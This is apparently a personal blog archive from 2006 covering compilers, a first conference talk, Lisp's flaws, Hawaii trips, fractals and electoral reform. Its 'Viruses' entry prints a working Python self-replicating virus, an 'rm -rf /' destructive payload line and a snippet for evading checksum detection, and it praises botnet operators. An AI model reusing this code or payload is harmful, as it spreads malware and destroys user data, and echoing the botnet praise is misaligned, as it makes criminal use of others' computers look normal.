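            if tokens[i] == "(":
                node, i = expr(i + 1)
                return node, i + 1          # skip the ")"
            return int(tokens[i]), i + 1
        return expr(0)[0]

    def generate(node):
        # walk the tree and print every node in language B
        if isinstance(node, int):
            return str(node)
        op, left, right = node
        return "(%s %s %s)" % (op, generate(left), generate(right))

    print generate(parse(lex("1 + 2 * (3 - 4)")))   # (+ 1 (* 2 (- 3 4)))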

For a really simple language a compiler will fit in a few hundred lines. It gets tricky when you want to make an interesting language. For the language to be fast you need to transform the AST to eliminate slow operations. Such optimizations include loop unrolling, function call inlining and tail call elimination. Interesting languages will also include a runtime environment: closure bindings, garbage collector, type system, etc. The target audience for those topics being limited, there are no general resources where one could learn them. But if you ask in the right place, you might get a list of grimoires with many spells related to those dark arts.

Even though thaumaturgy will never be easy to learn, it is comforting to see that one can learn to conjure without going through an apprenticeship. As the task of making a new programming language becomes surmountable, the question "What features should a new language have?" becomes a fixation, a puzzle that the warlock must solve to achieve wizardry.

2006-10-01 On Talks

Last Sunday I presented my very first research paper at a scientific conference. That's an intimidating experience, but I survived and, if I can trust the comments on my performance, I was able to present our work properly.

This is an aspect of scientific research that is completely skipped in science classes: how does peer review work, and why is it effective at separating science from religion? One first point to clear up is that there is absolutely no consensus. You often read nonsense like "scientists believe foo and blah". Scientists don't believe anything, and the explanations they use for natural facts are not the same for everyone. As an example, since it was a conference on comparative genomics, probably everyone in the room would agree that saying a super being created all life as we know it around 10k years ago isn't a useful model to explain what we see. But even though the general idea that there is some evolution going on is considered reasonable, we had a presentation on how a tree of life doesn't make sense, and the speaker wasn't torched as a heretic. He revised the model of the tree of life to include lateral gene transfer: something that we observe. This is exactly how science differs from religion. A dogma must be accepted or you are anathema. A scientific theory is exactly that: a theory. Everyone knows that it is likely to miss some details, and it's part of its goal to be revised.

But let's forget about evolution, since it's just a theory, and let's talk about the peer review process. Scientists, most of them working in universities and doing research to avoid students, do experiments and observe stuff. I use those terms loosely, since doing an experiment can mean benchmarking a garbage collector or attacking the Riemann Hypothesis with differential geometry. Once in a while they publish what they found, so they write a paper on it. It doesn't need to be a major breakthrough, just a little "hey look, making a bitmap of the memory heap allows us to collect garbage 3.8% faster." That way the common knowledge is documented and someone else working on garbage collectors will know that he should make bitmaps.

So far so good, but why can't you write a paper on how you can explain the whole universe with the action of an invisible pink unicorn? Hiding in labs isn't an efficient way to avoid students. They eventually learn that waiting at your office door won't work, and then they find your lab and start to wait for you there. Some scientists studied the problem and found a better approach: just leave the city! So scientists organize scientific conferences in foreign cities. They gather there for a few days, enjoy free coffee and talk about how bad jet lag is. There is even a funny city selection algorithm that ensures that a conference on a given topic won't be in the same country the following year.

Scientists publish their papers in those conferences; that way they have some excuse to have someone else pay for the plane ticket (that someone is usually the tax payers). But they don't want students to wait for them at the conference, so there is a selection committee. The selection committee is a bunch of scientists who published papers on the topic of the conference and who have the thankless task of reading all the submissions in order to: 1) reject anything that talks about unicorns, 2) tell which are the best so you don't have too many people. Yes, there is another catch: if your paper is selected, you have to go on the stage and tell everyone what you did. Obviously you need to limit the number of presenters if you don't want your conference to last a whole month.

The conference organizers have a really good trick to motivate the selection committee: they publish who they are. Each paper is assigned a few anonymous reviewers, but the whole selection committee is known. So if someone climbs onto the stage and talks about pink equidae, they all go down with him. And that's pretty much it. I mean, there is nothing else to prevent you from publishing anything you want; you just have to convince two of your three reviewers that you don't talk about unicorns. An alternative approach is to bore them to death so they don't finish reading your paper, but that's tricky since you more or less need to bore the audience to death during your presentation too.

"How about the presentation?" you may ask at this point. Well, once your paper is selected you are going to be published in the proceedings, the presentation is seen as a simple formality by many so they just send some random student on the stage (the rare students who discovered the research lab) while they enjoy free coffee. I think that in principle the presentation is supposed to expose in simple term what you found so people will want to read your paper or ask more questions during lunch break. In practice the schedule is extremely tight: 25 minutes for the talk and 5 minutes for questions. This is too short for anything but the most trivial work and without hope to have the message passed clearly the presenters just slam definitions and theorems on the screen while the audience nod pensively. Ok this isn't fair since a few presenters manage to distillate their results and to show just a few key aspects but clearly. There is also another path to publish your results: peer reviewed papers. Those are more of less like conferences but you don't have to do the talk. There is a selection committee and everything else. But since I'm writing about presentations I won't elaborate on those.

Learning is hard; it's even harder when you don't control the pace. A lecture is an inefficient way to transfer knowledge. It achieves parallelism, but the pace will be set too slow or too fast for most people. Good books are much more efficient: they let you go fast through the easy parts and slow through the hard parts. Unfortunately books are often written by lecturers, and they have an implicit pace that prevents the reader from adapting effectively. The Stanley books on combinatorics are so dense that you can't read more than a few pages per hour. Other books use so many words to describe simple stuff that you can read only the long words without losing much. When a book is longer than 700 pages, you should be suspicious; a really fat book on economics by Mankiw comes to mind. A talk at a conference is the worst you can expect: you have 25 minutes and you can't clarify the botched aspects at the lecture the following week.

To convey the content as efficiently as possible, a lot of time must be invested in preparation. I don't know if you get used to it, but it seems that I spent nearly as much time preparing this 25 minute talk as I spent looking for results. This sounds quite inefficient to me. Just imagine all the stuff that we could find if all the people in the audience had twice as much time to do actual research. There isn't much I can do to fix how we do science, so let's talk about talks.

Being a natural orator must be a rare talent, otherwise Powerpoint wouldn't be as pervasive as it is. Peter Norvig has an eloquent example of how bad it can get. But still, people come on the stage, load a colorful set of slides and flip them at the audience. Not all presentation systems are created equal. Most of them offer a linear view of the slides, that is, they present the slideshow as a sequence of loosely related slides. With some discipline a user can forge a plan and insert a few key slides to tell the audience where we are in the talk and where we are going.

For my slides I used Beamer. This nice LaTeX package lets you start with an outline where you define the sections of your talk. You then insert the slides where they should go and you get nice navigation. The output is PDF with internal links everywhere: you can click on a section name in the outline to go there, or use the top navigation bar to the same effect. Since you are in LaTeX you can typeset math properly and have a good separation of content and style.
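A skeleton is short enough to show whole; this one is a minimal example of my own, not a slide from the talk:

    \documentclass{beamer}
    \title{My First Talk}
    \begin{document}
    \frame{\titlepage}

    \section{Introduction}

    \begin{frame}{Outline}
      \tableofcontents    % every entry is a clickable internal link
    \end{frame}

    \begin{frame}{A slide with math}
      Properly typeset: $\sum_{i=1}^{n} i = \frac{n(n+1)}{2}$
    \end{frame}
    \end{document}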

But I still support the idea that all presentation software sucks. Since you are in LaTeX you have baroque (I love this word) restrictions on the image formats you can use. Why can't I use SVG? Why won't pdflatex handle EPS? Why does latex+dvipdfm produce artefacts in my rasters? Using LaTeX is as easy as changing the spark plugs on a Ford Astro (yeah, you don't get it, but trust me, it was painful). LaTeX produces extremely high quality typesetting and does a not too bad job of separating content and presentation. But using it is such a pain. What is this crap about compiling twice to get the cross references? Can't you just do it until it's OK? Where is the option --with-toc-please? The LaTeX markup looks like line noise, but what to say about the output while you compile your document? Now, let's talk about documentation. No LaTeX, or even TeX, package comes with online doc. All they have is LaTeX, or TeX, doc that is compiled into PDF. But Computer Modern, the default TeX font, has extremely fine serifs that make it utterly unreadable on a computer screen. No one bothers to make man pages or HTML doc; how dare I suggest using such a crude typesetting system? Will I complain about the poor unicode support? Probably not, you've had enough already.

Let's sum up: conferences are an effective way to avoid students. The selection committee is good at filtering out papers on invisible pink stuff. Short talks are really bad, so you'd better present only a few key aspects and have a good plan. If you have to use presentation software, use Beamer because it sucks less. Once we have our non-baroque Lisp we need to write a non-baroque typesetting system. And finally, I survived my first talk!
: D

2006-09-28 Programming Languages

In The Hundred-Year Language, Paul Graham claims that the language we will use in 100 years would be great to have now. I think he is wrong. He probably also thinks he is wrong, because he seems to have stopped working on Arc. In Worse is Better, Richard Gabriel argues that Unix and C came to lead because implementation simplicity is as important as interface simplicity. Every now and then you read a post on Planet Lisp about how we should fix Lisp. Since Paul Graham isn't likely to do it, let's look at what it means and how someone could do it.

Lisp is more or less a family of programming languages with a few key features, though some may argue about the exact minimal set needed to be called a Lisp: simple sexp syntax, dynamic typing, macros, garbage collection, first class functions, closures and a few other things like built-in linked lists and programming in the AST instead of line oriented command lists. There are two members of that family that still have a decent community and can be used for general programming: Common Lisp and Scheme.

Scheme can be thought of as the bare minimum you can have and still be a Lisp. In fact it's probably the bare minimum you can have and still be a useful programming language. In Scheme there are no loops: you recurse all the time, but the spec makes it mandatory for your implementation to do tail call elimination. Scheme has other power features like continuations. Scheme is really small, and that makes it an ideal embeddable scripting language. Sadly the spec doesn't include a module system, and all the implementations now have more or less incompatible ideas of how it should be done. That means you won't find repositories of Scheme libraries that you can expect to work across many implementations. That very sad point more or less rules out Scheme for general programming and I won't discuss it further.

Common Lisp (CL) is at the other end of the spectrum. With Common Lisp you have a huge language with many features including optional type declarations, selectable levels of compilation (safe, fast, debug, ...), many native types and containers, exceptions (and other "conditions") and an object system so flexible that I would need ten pages just to list its features. There are many cross implementation libraries out there, and that makes Common Lisp a great language for general programming. This language is extremely flexible. You typically bend the language into the language you would want for solving a family of problems, and then program in your new language. This is probably new to most programmers, but making your own domain specific language can be quite easy, and you don't need to mess with a formal grammar if you have macros. The Common Lisp macros let you use Common Lisp to rewrite code that is already in AST form. You can make code walkers that rewrite definitions when keywords are found; you can add new looping constructs, say to iterate over a ternary tree, and your new language embeds well into CL and supports embedded CL transparently. That being said, I often decide to use Python or some other language because of a few problems with Common Lisp. I think we can "fix Lisp"; we just need to take the time to diagnose the problems.

Common Lisp was standardized a long time ago. It is impressive that a language could be designed so early and still kick the ass of modern languages feature wise. On the other hand, the design feels baroque in some ways. A major annoyance is the pathname interface. In modern languages you refer to a file with a string, a path to your file in the directory tree where "/" separates directories. Some languages include a function to merge directories so you don't notice that there are broken systems that don't use "/" for the right thing. Some globbing is expected to work almost everywhere, like "*.txt". In CL the interface to refer to files is over engineered and includes aspects that no modern OS supports anymore, like versions of a file. In Python you would open(join(base, "foo-"+bar+".txt")); in CL, even if you use raw strings instead of pathnames, you can be sure that some implementation will parse your paths and wreak havoc when it finds funny chars in your filenames. Yes, you can fix that with some packages, but since those are not part of the spec, implementations don't include them. So you can't expect that if you mail someone your snippet of code using non-baroque pathnames it will run.
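Spelled out, the Python version of that one liner, with hypothetical base and bar (and the globbing you expect to just work):

    #!/usr/bin/python
    import glob
    from os.path import join

    base = "/tmp/reports"                      # hypothetical directory
    bar = "42"                                 # hypothetical name fragment
    print join(base, "foo-" + bar + ".txt")    # /tmp/reports/foo-42.txt
    print glob.glob(join(base, "*.txt"))       # [] here, file paths elsewhere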

That brings me to my next irritation: shell scripting. Bash is a damn good command interpreter but a really bad scripting language. I mean, foo="blah qwe" should be the same as foo = "blah qwe", don't you think? So I don't script in bash unless what I want to do is really simple. You'd expect that CL, with its tons of libraries and specialty looping constructs, would be my scripting language, but it isn't. The spec is quite strict about the fact that "#" is not a comment char. So no "#!/usr/bin/cl" for you guys. OK, we can work around that; the fix is ugly and still not included in the default install of most implementations, but there is more to it. A long time ago, it seems, when the CL spec was drafted, the concept of a process wasn't as pervasive as it is today. Common Lisp doesn't include a way to call another program. Before you over react to that statement, rest assured that all the implementations include a non-standard way to do so. You'll find some really fancy stuff with communication channels much more flexible than pipes, but the fact that something this simple isn't portable is an argument against using CL for your shell scripting. Needless to say, support for getting the command line arguments is strange too.

Another problem is deployment. Most packages these days use ASDF. Unlike Python and Perl, there is no support for packaging and deployment of CL modules; ASDF only covers the loading of the module. That makes publishing CL code more painful than it should be, so many potential libraries just sit on hard drives and never get released. Here is what Trevor Blackwell has to say about it:

 
   It's worth distinguishing a third category of programming
   environments: one where a solitary hacker uses many
   open-source modules written by various folks. I consider this
   a very good environment, unlike pack programming. But it has
   some requirements in common with it. Various languages succeed
   or fail dramatically in making this work smoothly.

   In C/C++, I find I can almost never use other people's stuff
   conveniently. Most have some annoying requirements for memory
   management, or use different string types (char *, STL string,
   GNU String, custom string class), or array/hash types, or
   streams (FILE *, iostream) or have nasty portability
   typedefs (int32, Float).

   CL has fewer such troubles since it has standard memory
   management & string/hash/array types, but there are often
   nasty namespace collisions or load order dependencies,
   especially with macros.

   Most chunks of CL code I've seen (which are mostly PG's) won't
   work without special libraries, which have short names and are
   likely to conflict with other macro libraries or even
   different versions of the same macro libraries.

   Perl packages work pretty well, because everyone agrees on how
   basic types like string, stream, array and hash should work,
   and the normal use of packages avoids any namespace
   collisions. I don't think I ever had a open source Perl module
   break something. I guess Java also prevents conflicts, but you
   have to give up an awful lot to get it.  The huge assortment
   of open source Perl packages testifies to the ease of writing
   them. I've taken a few packages that I wrote for my own
   purpose and found it very easy to make them self-contained and
   contribute them. Usually, people only write C++ libraries for
   very large projects, and it requires a different programming
   style from what you'd use for your own code.

   Anyway, I suggest that Arc's modularity features should be
   designed to support use of open-source modules in
   single-hacker projects, not to support pack programming. This
   suggests, in addition to what CL already has:

   - that modularity be a convention (CL, Perl), not something
   enforced by the compiler (Java). Sadly, I find the CL module
   system way to cumbersome to actually use. It has to be
   convenient enough to use in ordinary programming, not a
   special thing you use when you're writing a module for
   external use.

   - there be a sufficient basic library that everyone won't have
   to write their own basic library. I'm talking about the sort
   of functions from On Lisp like last1, in, single, append1,
   conc1, mklist, flatten. If everyone has their own, then you
   have to package it up with any code you publish (making it
   awkward to publish) and it'll be hard to read other people's
   code with different definitions of basic functions.
  

Now, what do we learn from that? OK, maybe you don't know CL and you think that it's a crap language that isn't worth learning. You are probably wrong, but the bottom line is that the best language ever designed isn't that useful if it isn't aware of your computing environment. For The Hundred-Year Language, I just don't care how good your language is if it's trapped in autism.

Can we fix CL? I don't know. Should we? No. Paul Graham is right, it's time for the next Lisp in the family. But Paul Graham is wrong, it's not the time to make another CL, it's time to make another C, that is, a simple language with a simple implementation that will be useful now, not in 100 years. He is also wrong when he says that his language should not be for scripting Unix. Scripting Unix still sucks, but it's still how many great packages get started. What are web apps if not Unix scripting anyway? You look at Perl, Python and Ruby and you know that no matter how bad your language is, as long as it includes more Lisp features than the one before it, you will have a large hacker base. And the hackers are the ones who make the libraries, and that's what makes a language useful for day-to-day coding. The right language will make simple things real simple and hard stuff doable. CL makes it possible to build a symbolic algebra system but makes it way too hard to parse my server logs. Perl got popular when sysadmins decided that bash wasn't good for scripting and opted for the next quick hack language.

How do we make this new Lisp? I don't know. Paul Graham did some work and posted a few ideas from others. Dave Moon's comments are interesting. I like the idea of some bits of syntax. Perl has way too much syntax, but hash tables are definitely more convenient to use in Python than in CL: hash[key]=foo vs (setf (gethash key hash) foo). We probably can get 80% of non-baroque CL in 20% of the time it takes to make a CL implementation. I think one has to write down a few snippets of code in his new language to see how it looks, then draft a spec and grind out an implementation. One thing that I'm sure of is that this implementation should not be done with CL macros: that would make it too tempting to keep plenty of baroque constructs. CL has multimethods, but there is something nice about "mono methods": they prevent namespace pollution. When methods are part of the object, methods with the same name can have different signatures. There is a use for both kinds of methods; I just don't know how well they could interact. OK, there are many other aspects that need to be looked into and I don't know where to start.

There is an urgent need for a modern Lispish programming language. This quote from Wolfram sums it up: "What's made it happen for me is Mathematica. I built Mathematica to have a general and very high-level computational environment that would let me do experiments and set up models easily. And it's worked fantastically well. I would never have been able to discover more than a tiny fraction of what I have without Mathematica."

2006-09-05 On Smashing Stuff

Since I haven't made a proper recap of the summer school yet and this Slashdot comment of mine made it to +5, I think I should link to it from here.

More to come real soon now(tm).

2006-08-07 Big Island part 1

Even though there is a lot to say about the CASS and about Oahu, I can't find the time to post updates. I will do a good summary when I can, but this weekend was the field trip to Big Island and many asked for updates, so here is a quick summary.

We left Oahu early Saturday morning. The inter-island flight is less than an hour: you just climb up, get a scenic view of all the islands and go down into cloudy Hilo. Big Island is really young, less than a million years old. Erosion has only dug rocky rivers and there are waterfalls everywhere. We were ahead of our schedule, so we had time for a hike in the morning. Around Hilo there is heavy rain forest; as you climb up Mauna Kea you cross many different ecosystems, from deciduous forest to shrubland and tundra.

While getting acclimated at the Onizuka Station we went for a hike on cinder cones. The station is above most of the clouds and the view was breathtaking. The oxygen-lean air gave us a good buzz, a diluted preview of what to expect at the summit. We had the honor of getting dinner at Halepauhaku, the small lodge where astronomers and support staff are hosted.

Guides led the caravan of jeeps and trucks on a rough gravel road that reaches the top. Rangers closed the pack with spare oxygen masks in case someone fainted. Above the clouds there is no vegetation; the landscape is essentially cinder cones with colors from dark tan to rust-red, most of them light tan like beach sand. We finally arrived and saw the telescopes. We were surrounded by the biggest mirrors and the best instruments in the world. The wind was cold and the air was lean; a strange sense of peace settled in while we were lectured on those majestic instruments and on the geology of Mauna Kea. The presentation included a visit inside both the Keck 1 and the UH observatories.

After another meal at Halepauhaku we enjoyed the moonrise and the sunset between the station and the summit. We unfortunately went on one of the rare days when it's too cloudy at the station to do stargazing, but that gave us an excuse to enjoy mai-tais at Uncle Billy's tiki bar.

Sunday morning was rainy in Hilo. We nevertheless went snorkeling at a black sand beach. The coral reef was filled with colorful fishes and sea urchins. We left Hilo around 10:00 for an exclusive lecture on the Kilauea and the geology of the Hawaiian Islands. We were fortunate enough to meet a geologist who was back from an active flow and who drew us a map of the area. The geology around the Kilauea is so active that all maps are obsolete as soon as they reach the printing press.

Getting to the active flow required an hour of hiking on a pahoehoe lava field. The field reaches as far as you can see. The black iridescent rock is full of sharp, millimeter-long glassy flakes. I just touched the ground without my gloves and I had blood droplets all over my hand. If someone were to use an ungloved hand to balance himself, he would probably leave most of his skin on the rock. Walking on the lava field sounds like walking in the snow when it's -30C: you hear tiny little obsidian crystals shattering as your feet cross the devastated land. The porosity of the rock gives great traction and it's possible to climb on the large, steep, busted-out bubbles of clogged lava tubes to get a better view.

As we progressed, the land gave signs that we were close to the active flow. The ground sounded hollow and there were fumes flowing out of cracks. Fresh pahoehoe flow has a dark silvery shine. With the wind on your back you can find the active flow by looking for wavy air. When you get close to the lava you can hear the sound of the barely solidified rock being twisted by the pressure of the flow, the crust cracking and the viscous fluid bending into ripples. The wind pushes the convection away, but the radiance is strong and the heat prevents you from stepping too close to Pele's house.

We unfortunately had to leave the nursery of the future mountain to catch our plane. All exhausted, out of water, sweaty, wet from the rain, but with large smiles on our faces as a rainbow guided us. The beer we had on the plane was the best I've ever had.

2006-07-24 CASS Day 1

I'm finally in Honolulu! The flight was long and uneventful. I had a lot of time to meditate on the landscape. My first thought was that Montreal had really turned into a sprawl, but seeing Los Angeles reassured me a bit. The welcome committee was composed of Guylaine Poisson, her husband Pascal and Mahdi Belcaid.

Those people are simply great! They have mastered their technical skills and they are the friendliest people you can imagine. They take me around a lot and call me up for lunches. Guylaine and Pascal live on the side of a huge crater with an amazing view. Their house is surrounded with exotic vegetation and there are geckos climbing on trees and walls everywhere.

My first day was relaxed since jet lag made me too sleepy to do anything. Just a bit of stargazing on the beach. The air is really dry in Honolulu. The beach is in downtown Waikiki, but you can see many stars. I don't see that many when I ride 45 minutes away from Montreal.

On the second day we went surfing. Mahdi is a great surf teacher. I took a longboard (as recommended by Mahdi) and after 30 minutes I was able to catch waves and stand up. When you look at surfers it all seems easy and relaxing, but it's actually pretty demanding. You need to paddle a lot, and fast, if you want to catch the waves. Friction with the board is kind of bad too. My nipples are still burning; I grabbed one of those lycra shirts, let's hope that it will fix that. The beaches are really impressive (yes, that's me in the water). The temperature is perfect and the water is extremely clear.

The CASS schedule is kind of great too. The presentations are in the morning and we have the afternoon for personal work and exploration of the island. Yeah, it sounds like vacations, but it's actually a pretty good place to learn about "real-time geology" and how life evolves where there are many different climates in close proximity. So the first day was mostly presentations of the schedule and a visit of the quite exotic campus.

In the afternoon Pascal took me for a hike on one of those breathtaking mountains. It was pretty hot but there is a constant breeze; the only real problem is the sun, but we were OK under the trees. The flora is obviously exotic. But the most unexpected thing was that there are no mosquitoes or other annoying insects at all. The trail wasn't too rough but still not that easy. We crossed paths with many locals wearing only swimsuits and flip-flops. In fact, I can't recall seeing a Hawaiian wearing anything else. At the end of the trail was a waterfall with crazy people jumping from a ten-meter-high cliff.

I love this place. More to come...

2006-05-01 w00t!

I've been accepted to the Computational Astrobiology Summer School in Honolulu!! The Hawaii Astrobiology Institute has an impressive team; I really look forward to working with them. What is astrobiology? Kind of hard to tell before I've attended the summer school, but it has something to do with the study of environmental samples from extreme conditions, like undersea volcanoes, and the evaluation of whether such resistant lifeforms could live on, say, Enceladus. It looks like I'll have to learn to surf. :-D

2006-03-31 Torrent Full of Lisp Porno Movies

The Mandelbrot set is the index of the parameters for which the Julia set is connected. Seeing how the two are related is quite interesting, especially with animations. And if you like the little sample, there is a torrent full of them.

The complete source code is included, of course. The walks along the main cardioid and the main bulb are pretty neat. From this we can guess that a walk along some secondary bulb would be especially nice. Now, I have to ask for help on that one. The points of intersection of the secondary bulbs are known; they are

   (/ (- 1 (expt (- (exp (* 2 #c(0 1) pi (/ p q))) 1) 2)) 4)
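
In more conventional notation (my own reformulation, which I believe is equivalent to the expression above):

   \lambda = e^{2\pi i p/q}, \qquad
   c_{p/q} = \frac{1 - (\lambda - 1)^2}{4}
           = \frac{\lambda}{2}\left(1 - \frac{\lambda}{2}\right)

that is, the standard parametrization of the main cardioid evaluated at the rational angle p/q.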

The main bulb is p=1 and q=2. The first person who tells me how to find the centers of the secondary bulbs will win a custom-rendered movie! Isn't that a good deal?

Update: the torrent is gone. BitTorrent is great for large files with flash popularity; without it, hosting large files like that would have been really difficult. The catch is that you need seeds and you can't hold on to them forever. The movie pack was downloaded 75 times for a total of 19 gigs. Wow! Thanks to all the seeds! I'll pay you back with more fractal stuff soon.

2006-02-25 Viruses

You sometimes hear nonsense like "there are no viruses for GNU/Linux". Anyone with half a brain knows otherwise, but why is this idea still alive? What is a virus anyway? A computer virus is a program that copies itself into other programs. To avoid being noticed, the virus keeps the infected program alive. So here is the plan:

  • plant an infected program where someone dumb will run it
  • when the infected program starts, the virus kicks in first
  • the virus looks for another program to infect
  • the virus launches the original program

Simple, isn't it? Yes, it's dead simple. Here is a working example:

#!/usr/bin/python

# This is a proof of concept virus for GNU/Linux.  As you can see by
# running it, it is possible to have viruses for GNU/Linux.
# Fortunately a sane privilege model will limit the amount of damage
# such a virus will do.

# I, Yannick Gingras <ygingras@ygingras>, wrote this virus for
# educational purposes.  I crippled it so it won't spread.  Use it at
# your own risk.

import sys
import os
import stat
import random
from tempfile import NamedTemporaryFile

TARGETS_DIR = "/tmp/infectable"
PRG = "echo hello" # will be replaced by the targets body
VIRUS = open(os.popen("which "+sys.argv[0]).read().strip()).readlines()
MODE = stat.S_IRWXU + stat.S_IROTH + stat.S_IXOTH

def infected(path):
    # not really good, we won't infect many files...
    return open(path).readline() == VIRUS[0]

def infect():
    if not os.path.isdir(TARGETS_DIR):
        return
    target = os.path.join(TARGETS_DIR,
                          random.choice(os.listdir(TARGETS_DIR)))
    if infected(target):
        return
    data = open(target).read()
    # copy our own source, but with the PRG line replaced by the
    # target's body, so the infected copy still runs the original
    lines = map(lambda l:(len(l)>5 and l[:5]=="PRG =") \
                and ("PRG = " + repr(data) + "\n") or l,
                VIRUS)
    open(target, "w").write("".join(lines))
    os.chmod(target, MODE)

def run():
    print "pwn3d!"
    # dump the original program's body into a temp file and run it
    # with the original arguments so everything looks (almost) normal
    tmp = NamedTemporaryFile("w")
    tmp.write(PRG)
    tmp.file.close()
    os.chmod(tmp.name, MODE)
    os.system(tmp.name+" "+" ".join(map(lambda a:"'%s'" % a,
                                        sys.argv[1:])))

if __name__ == "__main__":
    random.seed()
    infect()
    run()

This nice and portable virus will even run on any system Python has been ported to, not just on GNU/Linux. Why are most GNU/Linux systems free of viruses then? You might have noticed that this virus needs to open its target in write mode. That's the catch. On GNU/Linux, ordinary users can't open the system's programs in write mode. But someone dumb enough to run this file as root would be in big trouble.

There is something else. Looking at how simple a virus is, I hope people will stop thinking that virus writers are programming gods. Writing a virus is so easy that most people who can program never even try to do it. There is no challenge at all. Ever since I learned how to open a pipe, a long time ago, it has been clear in my head how a virus is made. I decided to write this one down because I noticed that this idea is not clear for some people who are otherwise really brilliant.

OK, yes, there is a bit more to it. This sample virus has no payload. To make it replicate and once in a while bust the whole system, you would need to change the payload to something like this:

       random.randrange(666) or os.system("rm -rf / &")

Still not much of a challenge. To avoid detection you need to replicate, but not verbatim. This is a bit harder with Python, but you could use Perl and be very creative in formatting the code in the target; a minimal sketch of the idea follows.
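
Here is one naive way to replicate "not verbatim" in Python (a hypothetical toy, not part of the virus above): every copy appends a random, throwaway top-level statement to itself, so no two copies have the same checksum.

   import random

   def mutate(virus_lines):
       # append a throwaway top-level assignment so that no two copies
       # of the virus are byte-for-byte identical; a scanner matching
       # an exact checksum of the file will miss the mutated copies
       name = "_" + "".join([random.choice("abcdefghij") for i in range(8)])
       return virus_lines + ["%s = %d\n" % (name, random.randrange(10 ** 6))]

Real polymorphic viruses go much further and re-encode their whole body, but the principle is the same.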

Where virus writers do display ingenuity is with botnets. Many "enterprise" vendors claim that they have a powerful "grid" solution. You see and hear "grid" everywhere, but what does it really mean? Grid usually refers to a heterogeneous cluster, where a cluster is a bunch of smaller computers duct-taped together to form a bigger computer, sort of. Some massively distributed solutions are available out there, like foo@home, distributed.net and BOINC, but they all seem to miss the big picture. What do I get from running their computation client? And why can't I send my own task to the grid?

Bot masters write viruses that install computation clients on infected computers. When someone wants a computation, he asks a bot master to run it on his infected computers. Bot masters are the first step toward the democratization of distributed computing power. When someone manages to find a convincing argument for people to install a distributed computation client, we'll have larger grid networks. And then, the leading grid networks will be the ones where everyone can bid and submit jobs, with no overhead: just download the devel-kit, derive the Cruncher class and upload it to the grid controller with your bid. Jobs could be kept in a priority queue ordered by bid, something like the sketch below. And we know there is a buck to be made in the democratization of the grid because bot masters are already getting rich.
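
The Cruncher class and the grid controller are my own daydream, so here is only a guess at what the controller's bid-ordered queue could look like in Python (all names hypothetical):

   import heapq

   class Cruncher:
       # what a grid user would derive from the hypothetical devel-kit
       def run(self, chunk):
           raise NotImplementedError

   class GridController:
       def __init__(self):
           self.queue = []    # pending jobs, highest bid first
           self.count = 0     # tie breaker: first come, first served

       def submit(self, bid, cruncher):
           # heapq pops the smallest item first, so negate the bid
           heapq.heappush(self.queue, (-bid, self.count, cruncher))
           self.count += 1

       def next_job(self):
           bid, count, cruncher = heapq.heappop(self.queue)
           return -bid, cruncher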

2006-02-11 Random stuff

When the urge to work comes over you, just sit down and relax; it should go away.

Many asked for details about my scope. As stated before, it's a Maksutov-Cassegrain; more precisely, it's a Skywatcher MAK90EQ1 with 90mm aperture and 1250mm focal length. While we are talking about stargazing, it's interesting to note that I won't have to make seasonal watch plans anymore because Universe Today released a 407-page PDF of daily watch plans for 2006. French readers will also enjoy this nice local sky guide optimized for 45 degrees of latitude.

I came across a really nice photo set today. This kind of miracle is only possible with the new democratization of the web. Some beekeeper decided to casually share photos of his hives. Definitely not something I would look for; I stumbled on those because of the magic of tags and "interestingness" computation. Had this been put on a personal home page with animated GIFs, we would all have missed the birth of a bee, the nobleness of a wild hive's architecture, the coziness of a nursery and the graphic comparison of young and old bee wings. Bee wings don't regenerate: each bee has a fixed flight expectancy. When a forager reaches the point where it can barely fly, it stays at the hive and uses its wings almost exclusively for cooling the hive.

In other news, what a shock it was to find that some people who used to claim to be GNU/Linux specialists and who still put penguins all over their website recently switched to IIS. No need to say that I won't get my next computer from this bunch of hypocrites who want to sell you their skill at building your web server with Gentoo but who can't run it themselves.

Let's end with good news. Quebec is quietly consulting its population on a possible redesign of its election system. This is really great stuff, except that no one knows about it. The first past the post (FPTP) system is really broken, but I think that in Quebec it shows more. In the 2003 elections one party had 18% of the votes but ended up with only one seat out of 125. Note that I don't advise anyone to vote for this particular fascist party. Duverger showed that FPTP tends to produce two-party systems and to favor strategic voting, that is, voting for someone you don't like but who you think can win. FPTP has nothing to do with democracy; it produces an alternation of the same two parties without any regard to what the population thinks. But now that we have an opportunity to get a new voting system, which one should we pick? Wikipedia has a bunch of articles on voting systems and I think that any Québec citizen worthy of the name has to at least read all of those. There is also this really nice survey of voting methods.

What stands out is that all voting systems suck. Forget about true democracy anytime soon. Proportional voting systems suck a bit less. If 51% of the population thinks that the other 49% should be shot, the 49% against the wall should have something to say about it. The easiest way to ensure proportionality is to have more than one person to elect per district. This can be achieved by merging existing districts or even by calling the whole country (some people still call this one a province) a single district with 125 representatives to elect. Québec has only two big cities, so merging all the districts into a single one might dilute important local questions. The system proposed in BC was to make several super-districts with single transferable vote. This ensures proportionality and local representation. The smaller the districts, the better the local representation, but you lose proportionality accordingly.

Inside a proportional legislature, you have to choose a voting system. You can get a list that you rank by priority, you can get multiple votes, or you can get a single vote, but since you have a super-district, small parties have a better chance to elect someone. With super-districts, small parties can be more efficient: if they expect to win only a few seats, they only need to field a few candidates, not 125 filler (proxy?) candidates who are just there to forward calls to the party leader.

Single transferable vote is interesting because it enables proportionality and minimizes wasted votes. What is a wasted vote? It's a vote for someone who would get elected anyway. STV is really simple too. You rank the candidates you like by priority. When your first choice has enough votes to get elected, the surplus votes are transferred to the voters' second choices. How many votes are enough to get elected depends on some strange formula (see the sketch below), but other unlucky folks went through the trouble of tuning it for us and it seems to work now.
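
If I recall correctly, the "strange formula" most STV systems use is the Droop quota, the smallest vote count that no more candidates than there are seats can all reach:

   def droop_quota(valid_votes, seats):
       # the smallest vote count that only `seats` candidates can reach
       return valid_votes // (seats + 1) + 1

For a five-seat super-district with 600,000 valid votes, that gives droop_quota(600000, 5) == 100001 votes to get elected.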

It's definitely not easy to pick a voting system, but it's easy to see we need a new one, now. So do your reading and fill out the voting commission's survey. And take a look at Saturn too, it's breathtaking!

2006-01-27 Evil All Around

I have a conjecture. It seems that most modern evil is the result of publicly traded companies. Why? I don't know; maybe it's the way power and accountability apply to publicly traded companies. Shareholders are not accountable, shareholders vote with their money, and shareholders have (mostly) no way to tell the board of directors what they think except through fluctuations of the share value. The net result is that even though shareholders have ethical values, the only usable metrics for the board of directors become the stock price and the balance sheet.

